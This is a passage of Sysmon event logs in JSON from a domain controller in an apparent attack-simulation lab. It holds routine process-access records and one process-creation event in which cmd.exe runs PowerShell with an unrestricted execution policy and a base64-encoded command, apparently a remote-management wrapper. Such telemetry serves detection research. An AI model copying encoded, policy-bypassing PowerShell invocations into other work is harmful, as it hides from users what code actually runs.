Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010550E0800}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010550E0800}","TargetProcessId":"4992","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.031\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nProcessId: 4740\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010550E0800}\r\nParentProcessId: 4992\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 